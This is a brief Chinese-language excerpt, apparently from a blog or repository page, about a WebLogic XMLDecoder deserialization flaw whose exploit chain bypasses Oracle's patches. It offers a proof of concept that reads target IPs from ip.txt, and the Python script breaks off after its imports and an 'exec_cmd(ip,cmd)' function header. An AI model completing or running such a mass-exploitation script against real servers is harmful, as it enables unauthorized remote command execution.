利用点是weblogic的xmldecoder反序列化漏洞,只是构造巧妙的利用链对Oracle官方历年来对这个漏洞点的补丁绕过. POC: IP填入ip.txt 后用poc检测 import requests import sys import time import random import threading def exec_cmd(ip,cmd): […]